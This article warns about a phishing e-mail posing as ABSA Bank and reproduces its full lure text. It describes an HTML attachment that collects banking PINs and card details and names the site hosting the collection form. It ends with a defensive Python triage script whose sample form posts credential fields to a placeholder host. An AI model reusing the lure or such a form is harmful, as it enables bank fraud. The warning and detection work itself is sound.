ABSA bank - fraudulent e-mail, dangerous payload


A very convincing e-mail is being distributed. It falsely claims to be from South Africa's ABSA Bank and, so far as this newspaper can tell, is being sent to a spam list that was first produced by or for the use of a training company and has since gone into the wild, so to speak. It does not discriminate geographically. It contains an attachment (Credit Card Statement.htm). The full e-mail is below.
******* body of e-mail, HTML stripped *********
Dear Customer
Please find attached your electronic statement.
Additional verifications have been added to your eStatement to help curb and prevent online fraud. Information only known to you will be displayed on the statement to confirm that the statement is sent by Absa. Your financial security is our main concern.
A mobile account summary PDF of your eStatement is also attached to this email to allow you to view it on your mobile device.
The Striata reader now supports both iPad and iPhone devices and allows users to open encrypted eStatements on these devices. Please search for Striata reader in the Apple AppStrore.
Kindly advise us of any changes to your email address to ensure that you always receive your electronic statement.
For more information, contact officialemail@absa.co.za or the call centre on 0860 111 123.
Yours sincerely
Digital Channels and Payments
eStatement verification
Installing the Striata Reader
1. Connect to the internet.
2. Download the Reader from the Striata Website (58Kb): Go to striata.com/download and click on 'Download Striata Reader'.
3. Select 'Open/Run'. If no 'Open/Run' option is given, select 'Save' and then 'Open'.
4. The Reader is now installed. Select 'Ok' to close the 'install confirmation' dialogue box.
5. Double-click on the encrypted attachment. You will be prompted to type in a password.
Installing Adobe Reader
To open your statement, you need to have Adobe Reader v 5.0 or higher. If you do not have Adobe Reader, go to get.adobe.com/reader to download the latest version.
Absa Bank Ltd Reg No 1986/004794/06 Authorised Financial Services Provider Registered Credit Provider NCRCP7
Important restrictions, qualifications and disclaimers (-the Disclaimer-) apply to this e-mail. A 'disclaimer' means we do not accept responsibility or we limit our responsibility for something related to this e-mail. To read this, copy the following address to your internet browser: absa.co.za/disclaimer. The Disclaimer forms part of the content of this e-mail in terms of section 11 of the Electronic Communications and Transactions Act, 25 of 2002. If you are unable to access the Disclaimer, send a blank e-mail to disclaimer@absa.co.za and we will send you a copy of the Disclaimer
Important Notice: Absa is an Authorised Financial Services Provider and Registered Credit Provider, registration number: NCRCP7. This e-mail and any files transmitted with it may contain information that is confidential, privileged or otherwise protected from disclosure. If you are not an intended recipient of this e-mail, do not duplicate or redistribute it by any means. Please delete it and any attachments and notify the sender that you have received it in error. Unless specifically indicated, this e-mail is not an offer to buy or sell or a solicitation to buy or sell any securities, investment products or other financial product or service, an official confirmation of any transaction, or an official statement of Absa. Any views or opinions presented are solely those of the author and do not necessarily represent those of Absa. This e-mail is subject to terms available at the following link: http://www.absa.co.za/disclaimer. The Disclaimer forms part of the content of this email. If you are unable to access the Disclaimer, send a blank e-mail to disclaimer@absa.co.za and we will send you a copy of the Disclaimer. By messaging with Absa you consent to the foregoing. By emailing Absa you consent to the terms herein. This email may relate to or be sent from other members of the Absa Group.
*************************
Buried in the mail, hidden in the plain-text version, is a link to a page at ezer.or.kr. In a directory several levels down on that site there is a form called "login.php" which contains a submit button, indicating that this is likely to be the place where information is collected, possibly without the knowledge of the owner of that site.
*********************
The attachment, Credit Card Statement.htm, creates a convincing copy of a page from the ABSA website on the victim's local machine. It runs JavaScript, which is capable of executing actions without the victim being aware of what it is doing. Of itself, JavaScript is safe, but some criminals use it for nefarious purposes.
The page is designed to collect online banking credentials including the customer's self-selected registration number and the related PIN, credit card numbers, expiry date and CVV as well as a PIN.
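An HTML attachment of this kind can be flagged statically before anyone opens it. The following is an added example, not code from this article or from ABSA: it assumes the attachment's form posts to a remote URL, and the field-name list, the sample markup and the host collector.example are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field-name fragments matching the data the article says the page asks for (assumed list).
SENSITIVE = ("pin", "pass", "card", "cvv", "expiry", "account")

class FormAudit(HTMLParser):
    """Collect each form's action, its sensitive-looking inputs, and a script count."""
    def __init__(self):
        super().__init__()
        self.forms, self.scripts = [], 0

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self.scripts += 1
        elif tag == "form":
            self.forms.append({"action": a.get("action", ""), "fields": []})
        elif tag == "input" and self.forms:
            name = (a.get("name", "") + " " + a.get("id", "")).lower()
            if a.get("type", "").lower() == "password" or any(s in name for s in SENSITIVE):
                self.forms[-1]["fields"].append(a.get("name") or a.get("type"))

def triage(html):
    """Return findings for an HTML file that arrived as a mail attachment."""
    p = FormAudit()
    p.feed(html)
    findings = []
    for f in p.forms:
        # A locally opened attachment has no site of its own, so an absolute
        # action URL means the entered data leaves the machine for that host.
        host = urlparse(f["action"]).hostname
        if host and f["fields"]:
            findings.append(("remote-credential-form", host, f["fields"]))
    if p.scripts:
        findings.append(("script-present", p.scripts))
    return findings

# Constructed sample, not the real attachment; collector.example is a placeholder host.
SAMPLE = """<html><body><form action="http://collector.example/a/b/login.php" method="post">
<input type="text" name="accessAccount"><input type="password" name="pin">
<input type="text" name="cardNumber"><input type="text" name="cvv">
<input type="submit" value="Logon"></form><script>/* page logic */</script></body></html>"""

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

A hit on `remote-credential-form` in a file attached to a "statement" e-mail is a strong reason to quarantine the message; a genuine statement has no reason to ask for a PIN or CVV.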
